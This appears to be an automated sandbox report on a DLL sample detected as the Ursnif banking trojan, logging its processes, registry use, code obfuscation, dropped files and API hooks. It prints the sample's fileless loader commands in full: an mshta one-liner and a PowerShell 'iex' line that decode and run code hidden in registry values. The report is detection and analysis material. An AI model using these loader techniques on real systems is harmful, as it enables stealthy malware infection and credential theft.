Source: 5fd9d7ec9e7aetar.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 5fd9d7ec9e7aetar.dll Virustotal: Detection: 12%
Source: 5fd9d7ec9e7aetar.dll ReversingLabs: Detection: 10%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\5fd9d7ec9e7aetar.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6276 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17418 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17428 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6276 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17418 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17428 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.422043781.000001E6E70F0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.431207881.000001C0B2EA0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000025.00000000.461622746.000000000EC20000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.443921700.0000000004840000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.pdb source: powershell.exe, 0000001C.00000002.495201758.00000224949BA000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000025.00000003.466485518.00000000074E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.443921700.0000000004840000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: explorer.exe, 00000025.00000003.466485518.00000000074E0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000026.00000002.460815536.0000026AEFA6C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.460815536.0000026AEFA6C000.00000004.00000040.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.pdbXPEu source: powershell.exe, 0000001C.00000002.495339304.0000022494A24000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.pdb source: powershell.exe, 0000001C.00000002.495201758.00000224949BA000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.pdbXPEu source: powershell.exe, 0000001C.00000002.495201758.00000224949BA000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000025.00000000.461622746.000000000EC20000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline' Jump to behavior
PE file contains sections with non-standard names
Source: 5fd9d7ec9e7aetar.dll Static PE information: section name: .data3
Source: 5fd9d7ec9e7aetar.dll Static PE information: section name: .data7
Source: 5fd9d7ec9e7aetar.dll Static PE information: section name: .data6
Source: 5fd9d7ec9e7aetar.dll Static PE information: section name: .data5
Source: 5fd9d7ec9e7aetar.dll Static PE information: section name: .data4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_015121C3 push ecx; ret 0_2_015121D3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01512170 push ecx; ret 0_2_01512179
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10013020 push ecx; ret 0_2_1001305B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002823 push edx; retf 0_2_10002826
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000408A push ecx; retf 0_2_1000408B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100020B3 push eax; retf 0_2_10002114
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100094B5 push edi; ret 0_2_100094BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002AC0 push ebx; retf 0_2_10002AC2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002AC4 push ebp; retf 0_2_10002AC8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10005AEE push esp; retf 0_2_10005AFC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100022F6 pushfd ; retf 0_2_100022FC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10008F01 push esi; retf 0_2_10008F04
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001D25 push ss; iretd 0_2_10001D26
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003B3B push ds; retf 0_2_10003B3E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003B40 push ds; retf 0_2_10003B46
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003B47 push ds; retf 0_2_10003B4A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000274B push ebp; retf 0_2_1000274C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003B4B push ds; retf 0_2_10003B4E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003B53 push ds; retf 0_2_10003B56
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003B5B push ds; retf 0_2_10003B5E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003B61 push ds; retf 0_2_10003B62
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003B63 push ds; retf 0_2_10003B66
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10009F97 push ecx; ret 0_2_10009F9F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003BA0 push ds; retf 0_2_10003BA8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001BA7 push esi; retf 0_2_10001BA8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003BA9 push ds; retf 0_2_10003BB0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003BB1 push ds; retf 0_2_10003BB4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10003BB7 push ds; retf 0_2_10003BB8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10012FC0 push edx; ret 0_2_10012FF3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100037DC push ds; retf 0_2_10003AD0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F6B0CB push ecx; ret 0_2_02F6B0DB

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
